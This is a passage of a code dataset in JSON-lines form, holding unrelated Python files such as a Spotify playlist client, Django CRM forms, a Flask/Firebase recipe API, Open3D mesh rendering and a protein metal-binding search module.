command = cast(List[str], d.pop(\"command\", UNSET))\n\n _cpu = d.pop(\"cpu\", UNSET)\n cpu: Union[Unset, ResourceMemoryT]\n if isinstance(_cpu, Unset):\n cpu = UNSET\n else:\n cpu = ResourceMemoryT.from_dict(_cpu)\n\n image = d.pop(\"image\", UNSET)\n\n _memory = d.pop(\"memory\", UNSET)\n memory: Union[Unset, ResourceMemoryT]\n if isinstance(_memory, Unset):\n memory = UNSET\n else:\n memory = ResourceMemoryT.from_dict(_memory)\n\n basic_workflow_opts_t = cls(\n command=command,\n cpu=cpu,\n image=image,\n memory=memory,\n )\n\n basic_workflow_opts_t.additional_properties = d\n return basic_workflow_opts_t\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"reinventingscience/ivcap-sdk-python","sub_path":"sdk_client/src/ivcap_client/models/basic_workflow_opts_t.py","file_name":"basic_workflow_opts_t.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35399459613","text":"import spotipy\nimport spotipy.util as util\n\n\nclass SpotifyClient(object):\n \"\"\"Log into Spotify\"\"\"\n def __init__(self, spotify_user_id, spotify_scope, spotify_client_id, spotify_client_secret, spotify_redirect_url):\n print('\\n Initialising Spotify Client...')\n spotify_token = util.prompt_for_user_token(spotify_user_id, spotify_scope,\n client_id=spotify_client_id,\n client_secret=spotify_client_secret,\n redirect_uri=spotify_redirect_url)\n\n if spotify_token:\n spotify_client = spotipy.Spotify(auth=spotify_token)\n\n self.spotify_user_id = spotify_user_id\n self.spotify_token = spotify_token\n self.spotify_client = spotify_client\n\n else:\n print(\"Cannot get Spotify token\")\n\n def create_playlist(self, spotify_playlist_name):\n \"\"\"Create A New Spotify Playlist\"\"\"\n self.spotify_client.user_playlist_create(self.spotify_user_id, name=spotify_playlist_name)\n\n playlist_id = ''\n playlists = self.spotify_client.user_playlists(self.spotify_user_id)\n for playlist in playlists['items']: # iterate through playlists I follow\n if playlist['name'] == spotify_playlist_name: # filter for newly created playlist\n playlist_id = playlist['id']\n print(\"Spotify playlist '{}' (id: {}) created.\".format(spotify_playlist_name, playlist_id))\n\n return playlist_id\n\n def search_spotify_tracks_uri(self, artist, track_name):\n \"\"\"Search For the Track\"\"\"\n results = self.spotify_client.search(q=f\"{track_name} {artist} \",\n limit=5, type='track') # get 5 responses since first isn't always accurate\n\n if results['tracks']['total'] > 0: # if track isn't on spotify as queried, go to next track\n uri = results['tracks']['items'][0]['uri']\n return uri\n else:\n print(\"No track found for {} - {}\".format(artist, track_name))\n\n def add_tracks_to_spotify_playlist(self, spotify_playlist_name, uris):\n \"\"\"Add Tracks To a Spotify Playlist\"\"\"\n\n # create a new playlist\n playlist_id = self.create_playlist(spotify_playlist_name)\n\n # add all tracks to the new playlist (Note: You can add a maximum of 100 tracks per request.)\n while uris:\n results = 
self.spotify_client.user_playlist_add_tracks(self.spotify_user_id, playlist_id, uris[:100])\n uris = uris[100:]\n return results\n","repo_name":"jeremyndeby/Youtube_To_Spotify_Automation","sub_path":"spotify_client.py","file_name":"spotify_client.py","file_ext":"py","file_size_in_byte":2642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"41467566997","text":"from dataclasses import field\nfrom django import forms\nfrom django.contrib.auth import get_user_model\nfrom .models import Category, Lead, Agent\nfrom django.contrib.auth.forms import UserCreationForm, UsernameField\n\n# retrieves the our custom user model\nUser = get_user_model()\n\nclass CustomUserCreationForm(UserCreationForm):\n class Meta:\n model = User\n fields = (\"username\",)\n field_classes = {'username': UsernameField}\n\nclass LeadModelForm(forms.ModelForm):\n class Meta:\n model = Lead\n fields = (\n 'first_name',\n 'last_name',\n 'age',\n 'agent', \n 'description',\n 'phone_number',\n 'email'\n\n )\n\nclass LeadForm(forms.Form):\n first_name = forms.CharField()\n last_name = forms.CharField()\n age = forms.IntegerField(min_value=0)\n\nclass AssignAgentForm(forms.Form):\n agents = forms.ModelChoiceField(queryset=Agent.objects.none())\n\n def __init__(self, *args, **kwards):\n request = kwards.pop(\"request\")\n agents = Agent.objects.filter(organization=request.user.userprofilemodel)\n super(AssignAgentForm,self).__init__(*args, **kwards)\n self.fields[\"agents\"].queryset = agents\n \nclass LeadCategoryUpdateForm(forms.ModelForm):\n class Meta:\n model = Lead\n fields = (\n 'category',\n )","repo_name":"IvansanchezEspinoza2019/crm-django","sub_path":"leads/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"44004885288","text":"import requests\n\nimport sys\nsys.path.append(\"..\")\nimport login\n\n\"\"\"\nDelete a Contact by using its id\n\"\"\"\n\nif len(sys.argv) > 1:\n contact_id = sys.argv[1]\nelse:\n contact_id = input(\"Enter the contact id to delete: \")\n\ntoken = login.get_token()\n \nurl = f\"https://www.nexpo.arkadtlth.se/api/contacts/{contact_id}\"\n\nheaders = {\n 'Authorization': token,\n}\n\nr = requests.delete(url, headers=headers)\n\nprint(r.status_code)\n\nif r.status_code == 200 or r.status_code == 204:\n print(f\"Successfully deleted contact with id {contact_id}.\")\nelse:\n print(f\"Failed to delete contact with id {contact_id}. 
Error: {r.text}\")","repo_name":"careerfairsystems/nexpo-backend-nova","sub_path":"UploadToDB/Contact/deleteContact.py","file_name":"deleteContact.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"18068930361","text":"from flask import Flask, jsonify\r\nimport json\r\nimport pyrebase\r\n\r\n#config for pyrebase (python wrapper for firebase)\r\nconfig = {\r\n \"apiKey\": \"AIzaSyD2UPwPcvgPKZ56qXOSAxnmSlUZSPMMsmc\",\r\n \"authDomain\": \"cookbook-94ca3.firebaseapp.com\",\r\n \"databaseURL\": \"https://cookbook-94ca3.firebaseio.com\",\r\n \"storageBucket\": \"cookbook-94ca3.appspot.com\"\r\n}\r\nfirebase = pyrebase.initialize_app(config)\r\ndb = firebase.database()\r\n\r\nprint(\"configured\")\r\n\r\n#create flask app\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/\")\r\ndef hello():\r\n return \"Starting up the cookbook\"\r\n\r\n@app.route(\"/removeUser/id=\", methods=['PUSH'])\r\ndef removeUser(id):\r\n db.child(\"Users\").child(id).remove()\r\n return \"success\"\r\n\r\n@app.route(\"/getUserRecipies/userId=\", methods=['GET'])\r\ndef getUserRecipies(userId):\r\n myDict = {}\r\n user_recipes = db.child(\"Users\").child(userId).get()\r\n for r in user_recipes.each():\r\n dic = r.val();\r\n name = r.key();\r\n myDict[name] = dic\r\n return json.dumps(myDict)\r\n\r\n@app.route(\"/removeRecipe/recipeId=&userId=\", methods=['PUSH'])\r\ndef removeRecipe(recipeId,userId):\r\n db.child(\"Users\").child(userId).child(recipeId).remove()\r\n return \"success\"\r\n\r\n@app.route(\"/getRecipe/recipeId=\", methods=['GET'])\r\ndef getRecipe(recipeId):\r\n myDict = {}\r\n rec = db.child(\"recipes\").get()\r\n for r in rec.each():\r\n dic = r.val()\r\n name = r.key()\r\n myDict[name] = dic\r\n return json.dumps(myDict)\r\n\r\nif __name__=='__main__':\r\n app.run(debug=True)","repo_name":"KunalSinha7/FamilyCookbook","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"23123612339","text":"# coding: utf-8\n# Dictionary of my non-alphabet keyboard mappings, ie: for punctuation and similar letters that exist on the keyboard but aren't in the English alphabet.\n# Saying the phrase on the left should generate the symbol on the right.\n# Symbols that are easier to say should be placed in the top of the list, since some screens won't need to show the symbols on the bottom of the list.\n# Order is preserved, since we use the order as the way to find the index that directly controls the mouse position.\n\nfrom collections import OrderedDict # Allows ordered dictionaries even in Python 2\npunctuationMap1 = OrderedDict()\npunctuationMap2 = OrderedDict()\n\n# Keyboard characters that aren't numbers or letters\npunctuationMap1[\"tilda\"] = u\"~\"\npunctuationMap1[\"quotes\"] = u'\"'\npunctuationMap1[\"at\"] = u\"@\"\npunctuationMap1[\"hash\"] = u\"#\"\npunctuationMap1[\"dollar\"] = u\"$\"\npunctuationMap1[\"percent\"] = u\"%\"\npunctuationMap1[\"caret\"] = u\"^\"\npunctuationMap1[\"plus\"] = u\"+\"\npunctuationMap1[\"minus\"] = u\"-\"\npunctuationMap1[\"equals\"] = u\"=\"\npunctuationMap1[\"colon\"] = u\":\"\npunctuationMap1[\"slash\"] = u\"/\"\npunctuationMap1[\"pipe\"] = u\"|\"\npunctuationMap1[\"comma\"] = u\",\"\npunctuationMap1[\"dot\"] = u\".\"\npunctuationMap1[\"question\"] = u\"?\"\n\n# These are part of normal keyboard characters, but since they are harder to say than 
most symbols, they are being added late so that they're less likely to be used (eg: Y axis on small screens probably won't use symbols this far down)\npunctuationMap2[\"underscore\"] = u\"_\"\npunctuationMap2[\"semicolon\"] = u\";\"\npunctuationMap2[\"backtick\"] = u\"`\"\npunctuationMap2[\"exclamation\"] = u\"!\"\npunctuationMap2[\"ampersand\"] = u\"&\"\npunctuationMap2[\"asterisk\"] = u\"*\"\npunctuationMap2[\"backslash\"] = u\"\\\\\"\npunctuationMap2[\"round bracket\"] = u\"(\"\npunctuationMap2[\"close round\"] = u\")\"\npunctuationMap2[\"square bracket\"] = u\"[\"\npunctuationMap2[\"close square\"] = u\"]\"\npunctuationMap2[\"curly brace\"] = u\"{\"\npunctuationMap2[\"close curly\"] = u\"}\"\npunctuationMap2[\"less than\"] = u\"<\"\npunctuationMap2[\"greater than\"] = u\">\"\n","repo_name":"shervinemami/BeamGrid","sub_path":"MacroSystem/punctuationmap.py","file_name":"punctuationmap.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"5"} +{"seq_id":"38336361453","text":"import subprocess\nimport os\n\nPACK_NAME = \"GQ\"\n# PACK_NAME = \"кремниевая долина\"\n\ncur_dir = os.path.join(os.path.join(os.getcwd(), \"voices\"), PACK_NAME)\n\nfor file in os.listdir(cur_dir):\n new_fn = os.path.join(cur_dir, os.path.basename(file) + \"2.ogg\")\n subprocess.run([\"ffmpeg\", '-i', os.path.join(cur_dir, file), '-acodec', 'libopus', new_fn, '-y'])\n","repo_name":"emiliskan/dudebot","sub_path":"utils/audio/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"28478385704","text":"from django.shortcuts import render\r\nfrom django.http import HttpResponse\r\n\r\ndef index(request):\r\n return render(request, 'index.html')\r\n\r\ndef contato(request):\r\n if request.method == 'GET':\r\n return render(request, 'login.html')\r\n else:\r\n print('Acesso via POST')\r\n\r\ndef login(request):\r\n if request.method == 'GET':\r\n print('Acesso via GET')\r\n \r\n\r\n else:\r\n request.POST.get(\"loginUser\")\r\n request.POST.get(\"senhaUser\")\r\n print('Acesso via POST')\r\n print(\"Acesso via POST com usuário\", request.POST.get(\"loginUser\"), \"e senha\", request.POST.get(\"senhaUser\"))\r\n return render(request, 'login.html')\r\n \r\n\r\n\r\n\r\n","repo_name":"Michel-9800/Desenv_Web","sub_path":"Desenv_Web/Desenv_Web/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20992839314","text":"# list1 = [1,2,3,4,5]\n# list1.pop(1)\n# list1.insert(1,2)\n# print(list1)\n\nfrom urllib.parse import urlparse\n\nlink = \"https://i2.chuimg.com/d1069cbb9b104e57aff215fda49c…008h.jpg?imageView2/1/w/150/h/90/interlace/1/q/90\"\no = urlparse(link)\nprint(o,type(o))\nprint(o.path,dir(o))\n\n","repo_name":"husainn/pacong","sub_path":"test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14892777239","text":"def day_1_1(file):\n with open(file) as input:\n content = input.readlines()\n solution = 0\n for i in range(1, len(content)):\n solution += int(content[i-1]) < int(content[i])\n print(\"Solution 1.1: \", solution)\n\n\ndef day_1_2(file):\n with open(file) as input:\n content = [int(elem.strip()) for elem in input.readlines()]\n solution = 0\n sum1 
= sum(content[0:3])\n\n for i in range(1, len(content)-1):\n sum2 = sum(content[i-1:i+2])\n solution += sum1 < sum2\n sum1 = sum2\n print(\"Solution 1.2: \", solution)\n\n\nday_1_1(\"files/input1.txt\")\nday_1_2(\"files/input1.txt\")\n","repo_name":"PaulokaxD/Advent-of-code-2021","sub_path":"day1.py","file_name":"day1.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21265102192","text":"import logging\nimport os\nimport subprocess\nimport sys\n\nfrom contextlib import contextmanager\n\n\n# ==============================================================================\n@contextmanager\ndef cwd(temp_wd):\n \"\"\"Execute code in a different working directory\n \n Parameters:\n `temp_wd` (`str`): The name of a directory to (temporarily) change to\n\n Change the current working directory, then automatically restore the previous working\n directory when done. Invoke `cwd()` like this:\n ```py\n with cwd(temp_wd):\n ...\n ```\n \"\"\"\n old_wd = os.getcwd()\n os.chdir(temp_wd)\n try:\n yield\n finally:\n os.chdir(old_wd)\n\n\n# ==============================================================================\ndef split_on_newlines(string):\n \"\"\"Split the string using newlines as the separator.\"\"\"\n return string.splitlines()\n\n\n# ------------------------------------------------------------------------------\ndef split_on_nulls(string):\n \"\"\"Split the input string using NULL characters as the separator.\"\"\"\n targets = [_ for _ in string.split('\\0') if _ != '']\n return targets or []\n\n\n# ==============================================================================\ndef setup_logging(loglevel):\n \"\"\"Set up basic logging.\"\"\"\n logformat = \"%(message)s\"\n logging.basicConfig(\n level=loglevel,\n stream=sys.stdout,\n format=logformat,\n datefmt=\"\",\n )\n return logging.getLogger()\n\n\n# ==============================================================================\ndef check_git_diff():\n \"\"\"Check for unstaged changes with `git diff`\n\n Returns: a list of the names of files with unstaged changes\n\n This check isn't perfect, because it can give false positives (if there are unrelated\n unstaged changes).\n \"\"\"\n git_diff_cmd = ['git', 'diff', '-z', '--exit-code', '--name-only']\n\n changed_files = []\n proc = subprocess.run(git_diff_cmd, capture_output=True)\n if proc.returncode != 0:\n changed_files = split_on_nulls(proc.stdout.decode('utf-8'))\n return changed_files\n\n\n# ==============================================================================\nif __name__ == \"__main__\":\n sys.exit(1)\n","repo_name":"keyboardio/Kaleidoscope","sub_path":"bin/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":712,"dataset":"github-code","pt":"5"} +{"seq_id":"71802901911","text":"n = int(input())\r\n\r\na = [int(input()) for _ in range(n)]\r\n\r\nres = 0\r\ncan = False\r\ni = 0\r\n\r\nwhile res<=n:\r\n i = a[i]-1\r\n res += 1\r\n if i == 1: \r\n can = True\r\n break\r\n\r\nif can: print(res)\r\nelse: print('-1')\r\n","repo_name":"YYSSSx/atc-by-Python","sub_path":"065B.py","file_name":"065B.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"175636595","text":"import argparse\nimport copy\nimport glob\nimport logging\nimport os\nimport time\n\nimport numpy as np\nimport matplotlib.pyplot as 
plt\nimport open3d as o3d\n\nfrom data_info import (not_standing, not_upright_plus, not_upright_minus, no_texture, mesh_list_needed_to_fix)\n\nfrom util import preprocess\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nch = logging.StreamHandler()\nch.setLevel(logging.DEBUG)\nlogger.addHandler(ch)\n\n\n\ndef capture_image(out_path,\n depth_path,\n mesh,\n ctr_x_rot,\n ctr_y_rot,\n w=1024,\n h=1024\n ):\n\n vis = o3d.visualization.Visualizer()\n vis.create_window(window_name='open3d', width=w, height=h, left=0, top=0, visible=False)\n\n vis.add_geometry(mesh)\n vis.get_render_option().mesh_show_back_face = True\n vis.get_render_option().light_on = False \n\n ctr = vis.get_view_control()\n ctr.rotate(ctr_x_rot, ctr_y_rot)\n param = ctr.convert_to_pinhole_camera_parameters()\n\n filename = out_path[:-3] + 'json'\n o3d.io.write_pinhole_camera_parameters(filename, param)\n\n s_cap = time.time()\n vis.poll_events()\n vis.update_renderer()\n vis.capture_screen_image(out_path)\n depth_image = vis.capture_depth_float_buffer(False)\n depth_image = np.array(depth_image, dtype=np.float32)\n np.save(depth_path, depth_image)\n logger.debug('Elapsed cap: {}'.format(time.time() - s_cap))\n\n vis.destroy_window()\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--mesh_dir')\n parser.add_argument('--out_dir')\n parser.add_argument('--resolution', type=int, default=1024)\n config = parser.parse_args()\n\n if config.mesh_dir is None:\n raise ValueError('config.mesh_dir is None')\n\n if config.out_dir is None:\n raise ValueError('config.out_dir is None')\n\n ### Make dir\n save_root = config.out_dir\n if not os.path.exists(save_root):\n os.makedirs(save_root, exist_ok=True)\n\n #o3d.utility.set_verbosity_level(o3d.utility.VerbosityLevel.Error)\n\n total_mesh_path_list = sorted(glob.glob(f'{config.mesh_dir}/*/*_textured.obj'))\n\n mesh_path_list = []\n for path in total_mesh_path_list:\n subj_name = path.split('/')[-2]\n subj_name = subj_name[:-4]\n if not subj_name in not_standing:\n mesh_path_list.append(path)\n\n logger.info(len(total_mesh_path_list))\n logger.info(len(not_standing))\n logger.info(len(mesh_path_list))\n\n start_iter = time.time()\n for mesh_i, mesh_path in enumerate(mesh_path_list):\n\n subj_name = mesh_path.split('/')[-2]\n subj_name = subj_name[:-4]\n\n ### Make dir\n image_dir = os.path.join(save_root, subj_name, 'images')\n if not os.path.exists(image_dir):\n os.makedirs(image_dir, exist_ok=True)\n depth_dir = os.path.join(save_root, subj_name, 'depth')\n if not os.path.exists(depth_dir):\n os.makedirs(depth_dir, exist_ok=True)\n subj_dir = os.path.join(save_root, subj_name)\n\n logger.info('Progressing [{} / {}] ...'.format(mesh_i+1, len(mesh_path_list)))\n logger.info(mesh_path)\n start = time.time()\n mesh = o3d.io.read_triangle_mesh(mesh_path)\n mesh.compute_vertex_normals()\n # Move the mesh into unit sphere\n mesh = preprocess(mesh)\n\n ### ** Make mesh to stand upright \n if subj_name in not_upright_plus:\n r_x = np.pi / 2\n rot_x = np.asarray([[1, 0, 0], [0, np.cos(r_x), -np.sin(r_x)],\n [0, np.sin(r_x), np.cos(r_x)]])\n mesh.rotate(rot_x, False)\n elif subj_name in not_upright_minus:\n r_x = -np.pi / 2\n rot_x = np.asarray([[1, 0, 0], [0, np.cos(r_x), -np.sin(r_x)],\n [0, np.sin(r_x), np.cos(r_x)]])\n mesh.rotate(rot_x, False)\n\n max_theta = 360\n rot_list = []\n\n if subj_name in mesh_list_needed_to_fix:\n r_y_value = 0 \n else:\n r_y_value = -90 \n rot_y = np.asarray([[np.cos(r_y_value), 0, 
np.sin(r_y_value)], \n [0, 1, 0],\n [-np.sin(r_y_value), 0, np.cos(r_y_value)]])\n mesh.rotate(rot_y, False)\n\n # Save pcd\n sampled_vs = np.array(mesh.vertices)[::5]\n sampled_ns = np.array(mesh.vertex_normals)[::5]\n \n pcd = o3d.geometry.PointCloud()\n pcd.points = o3d.utility.Vector3dVector(sampled_vs)\n colors = np.zeros(sampled_vs.shape)\n pcd.colors = o3d.utility.Vector3dVector(colors)\n\n out_complete_path = os.path.join(subj_dir, f'pcd.ply')\n o3d.io.write_point_cloud(out_complete_path, pcd)\n\n normal_path = os.path.join(subj_dir, f'pcd_normal.npy')\n np.save(normal_path, sampled_ns)\n\n init_r_x = np.pi\n for x_value in range(-2, 3):\n r_x = init_r_x + 0.5*x_value\n for r_value in range(-20, 20):\n r_y = (5*r_value) * (np.pi * 2 / max_theta) \n rot_list.append((r_x, r_y))\n\n rot_list = []\n for x_rot in range(0, 2100, 50):\n for y_rot in range(-300, 301, 100):\n rot_list.append((x_rot, y_rot))\n\n original_mesh = mesh \n check_start_time = time.time()\n for view_idx, rot in enumerate(rot_list):\n mesh = copy.deepcopy(original_mesh)\n rot_x, rot_y = rot\n \n ### Snapshot\n image_path = os.path.join(image_dir, f'view_{view_idx:03}.png')\n depth_image_path = os.path.join(depth_dir, f'view_{view_idx:03}_depth.npy')\n capture_image(image_path, depth_image_path, mesh, rot_x, rot_y, w=config.resolution, h=config.resolution)\n\n","repo_name":"jbjeong/human_fitting","sub_path":"mesh_rendering.py","file_name":"mesh_rendering.py","file_ext":"py","file_size_in_byte":5812,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"5"} +{"seq_id":"3923137469","text":"'''\nThe database used for the search should be the category database which is not selfcentered.\n\nThe category search only implement the pairwise-neighbor method, \nwhich tried to find all combination wins first. \nThen for each win_comb, search the metal-metal distance.\n\nThe method may be deprecated in the future.\n'''\nimport os\nimport itertools\nfrom sklearn.neighbors import NearestNeighbors\nimport multiprocessing as mp\nfrom multiprocessing.dummy import Pool as ThreadPool\nimport prody as pr\n\nfrom .search import Search_vdM, calc_pairwise_neighbor\nfrom .graph import Graph\nfrom .comb_info import CombInfo\nfrom ..basic import hull\nfrom ..basic import utils\n\nclass Search_category(Search_vdM):\n\n '''\n A new searching method based on sklearn NerestNeighbor radius_neighbors.\n The method is similarly used in COMBS by Nick Polizzi.\n One difference is that, we need to consider the overlap of metal coords from >3 aa sidechains. \n While for general ligand, one chemical group of aa bind one chemical group of ligand. 
\n '''\n def run_neighbor_search(self):\n '''\n All functions need to run the neighbor search.\n '''\n print('run_neighbor_search')\n\n #TO DO: where should I apply filters: win filter, query_metal filter, phipsi, etc.\n self.neighbor_generate_query_dict()\n\n self.neighbor_generate_pair_dict()\n\n if self.parallel:\n self.neighbor_search_wins_pool()\n else:\n self.neighbor_search_wins()\n\n self.neighbor_write_represents()\n\n self.neighbor_write_summary(self.workdir, self.neighbor_comb_dict, name = '_summary_' + self.target.getTitle() + '_' + self.time_tag + '.tsv')\n\n self.neighbor_write_log()\n\n return\n\n\n\n def neighbor_generate_pair_dict(self):\n '''\n To generate pair win dict, we will first filter out the impossible win pair by distance.\n Apply utils.check_pair_distance_satisfy()\n '''\n\n print('neighbor_generate_pair_dict')\n \n wins = sorted(list(self.neighbor_query_dict.keys()))\n print(wins)\n for inx in range(len(wins)):\n for iny in range(inx + 1, len(wins)):\n wx = wins[inx]\n wy = wins[iny] \n dist_ok, ws = utils.check_pair_distance_satisfy(wx, wy, self.dists)\n if not dist_ok:\n continue\n\n n_x = self.neighbor_query_dict[wx].get_metal_mem_coords()\n n_y = self.neighbor_query_dict[wy].get_metal_mem_coords()\n\n x_in_y, x_has_y = calc_pairwise_neighbor(n_x, n_y, self.metal_metal_dist)\n\n x_in_y, x_has_y = self.neighbor_filter_new(wx, wy, x_in_y)\n\n if x_has_y:\n self.neighbor_pair_dict[(wx, wy)] = x_in_y\n\n return\n\n\n def neighbor_filter_new(self, wx, wy, x_in_y):\n '''\n filter impossible pairwise connect.\n 1. validateOriginStruct\n 2. ABPLE filter. \n 3. phipsi angle filter. \n '''\n\n x_in_y_mask = [[True for j in range(len(x_in_y[i]))] for i in range(len(x_in_y))]\n\n for i in range(len(x_in_y)):\n if len(x_in_y[i]) <= 0:\n continue\n\n if self.validateOriginStruct:\n resx = self.target.select('name CA and resindex ' + str(wx)).getResnames()[0]\n resy = self.target.select('name CA and resindex ' + str(wy)).getResnames()[0]\n\n if not self.vdms[i].aa_type == resx:\n x_in_y_mask[i] = [False for j in range(len(x_in_y[i]))] \n continue\n\n if self.search_filter.filter_abple:\n apx = self.target_abple[wx]\n apy = self.target_abple[wy]\n \n if not self.vdms[i].abple == apx:\n x_in_y_mask[i] = [False for j in range(len(x_in_y[i]))] \n continue\n\n \n if self.search_filter.filter_phipsi:\n phix, psix = self.phipsi[wx]\n phiy, psiy = self.phipsi[wy]\n\n if (not utils.filter_phipsi(phix, self.vdms[i].phi, self.search_filter.max_phipsi_val)) or (not utils.filter_phipsi(psix, self.vdms[i].psi, self.search_filter.max_phipsi_val)):\n x_in_y_mask[i] = [False for j in range(len(x_in_y[i]))]\n continue\n \n\n if self.search_filter.filter_vdm_score:\n if self.vdms[i].score < self.search_filter.min_vdm_score:\n x_in_y_mask[i] = [False for j in range(len(x_in_y[i]))]\n continue\n \n\n if self.search_filter.filter_vdm_count:\n if self.vdms[i].clu_num < self.search_filter.min_vdm_clu_num:\n x_in_y_mask[i] = [False for j in range(len(x_in_y[i]))]\n continue\n \n\n for j in range(len(x_in_y[i])):\n j_ind = x_in_y[i][j]\n\n if self.validateOriginStruct:\n resy = self.target.select('name CA and resindex ' + str(wy)).getResnames()[0]\n if not self.vdms[j_ind].aa_type == resy:\n x_in_y_mask[i][j] = False\n continue\n\n if self.search_filter.filter_abple:\n apy = self.target_abple[wy]\n if not self.querys[j_ind].abple == apy:\n x_in_y_mask[i][j] = False\n continue\n\n if self.search_filter.filter_phipsi:\n phiy, psiy = self.phipsi[wy]\n if (not utils.filter_phipsi(phiy, 
self.vdms[j_ind].phi, self.search_filter.max_phipsi_val)) or (not utils.filter_phipsi(psiy, self.vdms[j_ind].psi, self.search_filter.max_phipsi_val)) :\n x_in_y_mask[i][j] = False\n continue\n\n if self.search_filter.filter_vdm_score:\n if self.vdms[j_ind].score < self.search_filter.min_vdm_score:\n x_in_y_mask[i][j] = False \n continue\n \n\n if self.search_filter.filter_vdm_count:\n if self.vdms[j_ind].clu_num < self.search_filter.min_vdm_clu_num:\n x_in_y_mask[i][j] = False \n continue\n \n x_in_y_filter = [[x_in_y[i][j] for j in range(len(x_in_y[i])) if x_in_y_mask[i][j]] for i in range(len(x_in_y))]\n\n x_has_y = any([True if len(a) >0 else False for a in x_in_y_filter])\n\n return x_in_y_filter, x_has_y\n\n\n\n\n def neighbor_get_win_combs(self):\n '''\n The combinations of positions are extracted from all possible positions with pairs.\n '''\n print('pair_dict_keys: {}'.format(self.neighbor_pair_dict.keys()))\n wins = sorted(set(self.neighbor_query_dict.keys()))\n print('All wins with overlap {}'.format(wins))\n\n win_ind_dict = {}\n for i in range(len(wins)):\n win_ind_dict[wins[i]] = i\n\n pair_set = set()\n\n for x, y in self.neighbor_pair_dict.keys():\n i = win_ind_dict[x]\n j = win_ind_dict[y]\n pair_set.add((i, j))\n\n paths = []\n for n in self.num_iters: \n paths.extend(utils.combination_calc(list(range(len(wins))), pair_set, n))\n\n win_combs = []\n for path in paths:\n win_comb = [wins[p] for p in path]\n win_combs.append(win_comb)\n return win_combs\n\n \n def neighbor_search_wins(self):\n '''\n The combinations of positions are extracted from all possible positions with pairs.\n '''\n win_combs = self.neighbor_get_win_combs()\n\n for win_comb in win_combs:\n print(win_comb) \n comb_dict = self.neighbor_run_comb(win_comb)\n self.neighbor_comb_dict.update(comb_dict)\n return\n\n\n def neighbor_search_wins_pool(self):\n '''\n multithread.\n '''\n win_combs = self.neighbor_get_win_combs()\n print('multithread search win_combs: {}'.format(len(win_combs)))\n if len(win_combs) <= 0:\n return\n num_cores = int(mp.cpu_count() - 1)\n print('pool: {}'.format(num_cores))\n # pool = mp.Pool(num_cores)\n # results = [pool.apply_async(self.neighbor_construct_comb, args=win_comb) for win_comb in win_combs]\n # results = [p.get() for p in results]\n pool = ThreadPool(num_cores)\n results = pool.map(self.neighbor_run_comb, win_combs)\n pool.close()\n pool.join()\n for r in results: \n self.neighbor_comb_dict.update(r)\n return\n\n\n def neighbor_run_comb(self, win_comb):\n #try:\n comb_dict = self.neighbor_construct_comb(win_comb)\n if len([comb_dict.keys()]) <= 0:\n return comb_dict\n _target = self.target.copy()\n self.neighbor_extract_query(_target, comb_dict)\n self.neighbor_calc_comb_score(comb_dict)\n self.neighbor_calc_geometry(comb_dict)\n self.neighbor_aftersearch_filt(_target, comb_dict)\n self.neighbor_write_win(comb_dict)\n return comb_dict\n # except:\n # self.log += 'Error in win_comb: ' + '-'.join([str(w) for w in win_comb]) + '\\n'\n # return {}\n\n\n def neighbor_construct_comb(self, win_comb):\n '''\n win_comb: [0, 1, 2, 3]\n\n cluster_dict: {(0, 0, 0, 0): {0:[1, 3, 4], 1:[2, 3, 4], 2: [2, 6, 7], 3:[1, 2, 3]}}\n The key is win, the value is list of index, each represent one metal coord exist in all other wins' metal.\n \n self.neighbor_comb_dict\n # { (wins, ids), (comb, combinfo)}\n # {((0, 1, 2, 3)(0, 0, 0, 0)): {(0:[1, 3, 4], 1:[2, 3, 4], 2: [2, 6, 7], 3:[1, 2, 3]), combinfo}}\n\n\n As we calculate all metals at the same time. 
